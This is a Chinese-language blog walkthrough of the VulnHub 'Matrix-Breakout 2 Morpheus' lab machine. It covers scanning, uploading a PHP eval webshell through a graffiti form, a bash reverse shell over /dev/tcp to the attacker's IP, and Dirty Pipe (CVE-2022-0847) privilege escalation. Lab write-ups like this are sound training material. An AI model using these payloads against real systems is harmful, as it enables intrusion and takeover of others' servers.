渗透实战（一）

合集 - 渗透测试(3)

1.渗透实战(四)2024-11-082.渗透实战(二)2023-12-14

3.渗透实战（一）2023-12-04

收起

前言：本文中涉及到的技术，只提供思路，严禁用于违法测试

靶机地址
ttps://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

下载后使用VMware打开靶机

然后开始渗透

1.打开靶机显示登陆界面

2.因为不知道账号密码所以只能从外网入手。要渗透首先要知道IP，所以将两个虚拟机都改为NAT模式

 然后我们进入攻击机查看IP以及靶机的IP，上面的是攻击机kali的ip地址，显然下面的就是靶机的IP。进行arp扫描，确定靶机IP地址，arp扫描命令为：arp-scan -l

3.使用nmap对靶机的端口进行扫描(超级用户权限下)

namp -A 192.168.159.137

 发现80端口开着 肯定要去看看是什么

使用浏览器打开，通过IP访问web界面

 4.查看端口详细信息，但也没什么收获

 5.使用御剑进行目录扫描

robots.txt
graffiti.txt
graffiti.php

逐个查看，最后发现graffiti.php上传后在graffiti.txt中会有记录

6. 使用BP进行抓包，尝试传点东西上去

 这里信息和文件名都写了，直接改就行

尝试写入一句话木马

<?php eval(@$_POST['123']);?>

 7.访问1.php文件发现是空白的，说明上传成功了，如果失败访问界面是无

 8.因此可以尝试蚁剑对webshell进行连接

 9.后续可以直接在蚁剑上的虚拟终端进行操作，也可以反弹shell在kali攻击机上操作

蚁剑直接右键

或者kali的话需要再传一个木马

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.159.134/6666 0>&1'"); ?>

 注意这里写的IP是攻击机kali的IP地址，因为是上传到靶机上的文件，通过靶机连接攻击机

 通过BP用相同的方式上传，要注意的是上传的是URL编码后的内容。

注意，普通的URL编码只会编码特殊字符，一般网站上都是如此，但BP有一款自带的编码器，可以进行广义的URL编码，加密所有内容，如图

这样就上传成功了，后面再在kali中监听6666端口来进行反弹shell(先开监听端口再发送文件)

nc -lvvp 6666

 10.到这里完成的就差不多了，后面就是进行提权(我这里是用蚁剑操作的)

先看看系统的版本

uname -a

 查了一下，发现系统Linux4.x|5.x有漏洞能直接用CVE-2022-0847。

那就使用CVE-2022-0847

在kali上下载

git clone https://github.com/imfiver/CVE-2022-0847.git

要让Dirty-Pipe.sh这个文件到靶机赋权然后执行

然后靶机下载里面的文件

wget http://192.168.211.130:8080/CVE-2022-0847

进入该文件的目录，然后执行

bash ./Dirty-Pipe.sh

提权成功

 可以查看/etc/passwd文件可以看到密码情况

__EOF__

本文作者：XFocus
本文链接：https://www.cnblogs.com/XFocus/p/18543189.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！